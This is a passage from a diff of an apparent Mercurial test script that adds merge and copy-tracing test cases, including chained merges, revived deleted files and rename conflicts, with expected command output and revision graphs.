h + o i-0 initial commit: a b h p q r @@ -548,13 +752,15 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + $ hg up 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mCB-revert-m-0" + $ hg ci -m "mCB-revert-m-0 $case_desc - one way" created new head $ hg up 'desc("b-1")' @@ -563,23 +769,23 @@ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mBC-revert-m-0" + $ hg ci -m "mBC-revert-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - @ 33 mBC-revert-m-0 + @ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -593,43 +799,724 @@ (the copy information from the branch that was not deleted should win). 
+ $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)" + $ hg up 'desc("i-0")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg mv b d $ hg ci -m "h-1: b -(move)-> d" created new head $ hg up 'desc("c-1")' - 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved $ hg merge 'desc("h-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mCH-delete-before-conflict-m-0" + $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way" $ hg up 'desc("h-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("c-1")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' + @ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + |\ + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + | |/ + | o h-1: b -(move)-> d + | | + o | c-1 delete d + | | + o | i-2: c -move-> d, s -move-> t + | | + o | i-1: a -move-> c, p -move-> s + |/ + o i-0 initial commit: a b h p q r + + +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +Multiple cases above explicitely test cases where content are the same on both side 
during merge. In this section we will introduce variants for theses cases where new change are introduced to these file content during the merges. + + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +Same as `mAEm` and `mEAm` but with extra change to the file before commiting + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) + + $ case_desc="merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent)" + + $ hg up 'desc("a-2")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "content change for mAE-change-m" > f + $ hg ci -m "mAE-change-m-0 $case_desc - one way" + created new head + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
+ (branch merge, don't forget to commit) + $ echo "content change for mEA-change-m" > f + $ hg ci -m "mEA-change-m-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + @ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: merge overwrite common copy information, but with extra change during the merge +```````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) +- the merge update f content + + $ case_desc="merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved +#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 
b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 +#endif + $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("f-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mBF-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mFB-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) 
+#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 + 8 * 1c334238bd42 7b79e2fe0c89 000000000000 +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 + 5 * cea2d99c0fde ae258f702dfe 000000000000 +#endif + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + @ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. 
+ + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + + $ hg up 'desc("c-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mCB-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) + + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mHC-delete-before-conflict-m-0" + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mBC-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) 
+ + + $ hg up null --quiet + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +We also touch J during some of the merge to check for unrelated change to new file during merge. + + $ case_desc="chained merges (conflict -> simple) - same content everywhere" + +(extra unrelated changes) + + $ hg up 'desc("a-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo j > unrelated-j + $ hg add unrelated-j + $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' + created new head + + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo k > unrelated-k + $ hg add unrelated-k + $ hg ci -m 'k-1: unrelated changes (based on "e" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mAEm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) 
+ 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + + $ hg merge 'desc("mAEm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mK,AEm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEAm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo jj > unrelated-j + $ hg ci -m "mEA,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("mEAm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
+ (branch merge, don't forget to commit) + $ echo jj > unrelated-j + $ hg ci -m "mJ,EAm: $case_desc" created new head - $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - @ 36 mHC-delete-before-conflict-m-0 + + + $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))' + @ mJ,EAm: chained merges (conflict -> simple) - same content everywhere |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o mEA,Jm: chained merges (conflict -> simple) - same content everywhere | |/ - | o 34 h-1: b -(move)-> d + | | o mK,AEm: chained merges (conflict -> simple) - same content everywhere + | | |\ + | | +---o mAE,Km: chained merges (conflict -> simple) - same content everywhere + | | | |/ + | | | o k-1: unrelated changes (based on "e" changes) + | | | | + | o | | j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |/ / / + | o / mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + |/|/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: chaining conflicting rename resolution, with actual merging happening +`````````````````````````````````````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 't'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 't' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. 
+ + $ case_desc="chained merges (conflict -> simple) - different content" + +(extra unrelated changes) + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ echo s > unrelated-s + $ hg add unrelated-s + $ hg ci -m 's-1: unrelated changes (based on the "p" series of changes)' + created new head + + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ echo t > unrelated-t + $ hg add unrelated-t + $ hg ci -m 't-1: unrelated changes (based on "q" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mPQm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("t-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQ,Tm: $case_desc" + +(merge variant 2) + + $ hg up 'desc("t-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mPQm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mT,PQm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("s-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQP,Sm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("s-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mS,QPm: $case_desc" + created new head + $ hg up null --quiet + + + $ hg log -G --rev '::(desc("mPQ,Tm") + desc("mT,PQm") + desc("mQP,Sm") + desc("mS,QPm"))' + o mS,QPm: chained merges (conflict -> simple) - different content + |\ + +---o mQP,Sm: chained merges 
(conflict -> simple) - different content + | |/ + | | o mT,PQm: chained merges (conflict -> simple) - different content + | | |\ + | | +---o mPQ,Tm: chained merges (conflict -> simple) - different content + | | | |/ + | | | o t-1: unrelated changes (based on "q" changes) + | | | | + | o | | s-1: unrelated changes (based on the "p" series of changes) + | | | | + o-----+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |/ / / + | o / mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + |/|/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v | | - o | 6 c-1 delete d - | | - o | 2 i-2: c -move-> d + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. 
+ + $ case_desc="chained merges (salvaged -> simple) - same content (when the file exists)" + +(creating the change) + + $ hg up 'desc("c-1")' + 5 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo l > unrelated-l + $ hg add unrelated-l + $ hg ci -m 'l-1: unrelated changes (based on "c" changes)' + created new head + +(Merge variant 1) + + $ hg up 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBC+revert,Lm: $case_desc" + +(Merge variant 2) + + $ hg up 'desc("mCB-revert-m")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("l-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mCB+revert,Lm: $case_desc" + +(Merge variant 3) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mBC-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,BC+revertm: $case_desc" + created new head + +(Merge variant 4) + + $ hg up 'desc("l-1")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + + $ hg merge 'desc("mCB-revert-m")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mL,CB+revertm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))' + @ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + |\ + | | o mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists) + | |/| + +-+---o mCB+revert,Lm: chained merges (salvaged -> simple) - 
same content (when the file exists) + | | | + | +---o mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + | | |/ + | o | l-1: unrelated changes (based on "c" changes) + | | | + | | o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + | |/| + o---+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + |/ / + o | c-1 delete d | | - o | 1 i-1: a -move-> c + | o b-1: b update |/ - o 0 i-0 initial commit: a b h + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r +Subcase: chaining "merged" information during a merge +`````````````````````````````````````````````````````` + +When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges. + + $ case_desc="chained merges (copy-overwrite -> simple) - same content" + +(extra unrelated changes) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo n > unrelated-n + $ hg add unrelated-n + $ hg ci -m 'n-1: unrelated changes (based on the "f" series of changes)' + created new head + + $ hg up 'desc("g-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo o > unrelated-o + $ hg add unrelated-o + $ hg ci -m 'o-1: unrelated changes (based on "g" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mFGm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) 
+ $ hg merge 'desc("o-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mFG,Om: $case_desc" + +(merge variant 2) + + $ hg up 'desc("o-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("FGm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mO,FGm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mGFm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mGF,Nm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("n-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mGFm")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mN,GFm: $case_desc" + created new head + + $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))' + @ mN,GFm: chained merges (copy-overwrite -> simple) - same content + |\ + +---o mGF,Nm: chained merges (copy-overwrite -> simple) - same content + | |/ + | | o mO,FGm: chained merges (copy-overwrite -> simple) - same content + | | |\ + | | +---o mFG,Om: chained merges (copy-overwrite -> simple) - same content + | | | |/ + | | | o o-1: unrelated changes (based on "g" changes) + | | | | + | o | | n-1: unrelated changes (based on the "f" series of changes) + | | | | + o-----+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + |/ / / + | o / mFGm-0 merge - G 
side: content change, F side: copy overwrite, no content change - one way + |/|/ + | o g-1: update d + | | + o | f-2: rename i -> d + | | + o | f-1: rename h -> i + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: chaining conflicting rename resolution, with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +The "mEA-change-m-0" and "mAE-change-m-0" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + + $ case_desc="chained merges (conflict+change -> simple) - same content on both branch in the initial merge" + + +(merge variant 1) + + $ hg up 'desc("mAE-change-m")' + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE-change,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mAE-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mK,AE-change-m: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mEA-change,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mEA-change-m")' + 1 files updated, 0 files merged, 1 
files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mJ,EA-change-m: $case_desc" + created new head + + + $ hg log -G --rev '::(desc("mAE-change,Km") + desc("mK,AE-change-m") + desc("mEA-change,Jm") + desc("mJ,EA-change-m"))' + @ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + |\ + +---o mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | |/ + | | o mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | |\ + | | +---o mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + | | | |/ + | | | o k-1: unrelated changes (based on "e" changes) + | | | | + | o | | j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |/ / / + | o / mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + |/|/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + Summary of all created cases ---------------------------- @@ -650,31 +1537,74 @@ f-2: rename i -> d g-1: update d h-1: b -(move)-> d - i-0 initial commit: a b h - i-1: a -move-> c - i-2: c -move-> d - mABm-0 simple merge - the other way - mAEm-0 simple merge - one way - mBAm-0 simple merge - one way - mBC-revert-m-0 - mBCm-0 simple merge - one way + i-0 initial commit: a b h p q r + i-1: a -move-> c, p -move-> s + i-2: c -move-> d, s -move-> t + j-1: unrelated changes (based on the "a" series of changes) + k-1: 
unrelated changes (based on "e" changes) + l-1: unrelated changes (based on "c" changes) + mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way + mAE,Km: chained merges (conflict -> simple) - same content everywhere + mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way + mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d - mBDm-0 simple merge - one way - mBFm-0 simple merge - one way - mCB-revert-m-0 - mCBm-0 simple merge - the other way + mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) + mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by 
merge) - one way + mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d - mCGm-0 - mCH-delete-before-conflict-m-0 - mDBm-0 simple merge - the other way - mDGm-0 simple merge - one way - mEAm-0 simple merge - the other way - mFBm-0 simple merge - the other way - mFGm-0 simple merge - one way - mGCm-0 - mGDm-0 simple merge - the other way - mGFm-0 simple merge - the other way - mHC-delete-before-conflict-m-0 + mCGm-0 merge updated/deleted - revive the file (updated content) - one way + mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way + mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way + mEA,Jm: chained merges (conflict -> simple) - same content everywhere + mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge + mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from 